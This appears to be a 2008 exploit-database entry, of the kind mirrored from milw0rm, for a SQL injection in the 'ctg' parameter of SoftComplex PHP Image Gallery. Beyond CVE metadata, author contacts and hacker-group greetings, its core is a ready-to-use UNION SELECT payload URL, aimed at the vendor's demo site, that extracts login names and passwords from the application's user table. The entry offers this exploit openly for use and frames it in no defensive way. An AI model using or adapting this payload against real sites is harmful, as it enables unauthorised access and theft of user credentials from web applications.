[] NeoSense

SoftComplex PHP Image Gallery - 'ctg' SQL Injection

Author: Hussin X
type: webapps
platform: php
port: 
date_added: 2008-11-05 
date_updated: 2017-01-02 
verified: 1 
codes: OSVDB-52808;CVE-2008-6488;CVE-2008-6485 
tags: 
aliases:  
screenshot_url:  
application_url: 

SoftComplex PHP Image Gallery ( ctg ) Remote SQL Injection Velnerability
___________________________________

Author:  Hussin X

Home :  www.IQ-TY.com  & www.TrYaG.cc

MaiL :   darkangeL_G85@Yahoo.CoM
___________________________________

script    : http://www.softcomplex.com/products/php_image_gallery/demo2/

_____

ExploiT & demo
_____________

http://www.softcomplex.com/products/php_image_gallery/demo2/index.php?ctg=39 and 1=0 UNioN seLecT 1,2,concat(login,0x3e,password),4,5,6,7,8+FROM+user&action=show




____________________________( Greetz )_________________________________
|
|   All members of the Forum| WwW.IQ-ty.CoM |  WwW.TrYaG.CC |
|
|  My friends : DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR | CraCkEr
|
|   Ghost Hacker | FAHD | Iraqihack | jiko | str0ke | Cyber-Zone | Sakab | G4N0K
|_____________________________________________________________________


                   Im IRAQi    |    Im TrYaGi

# milw0rm.com [2008-11-06]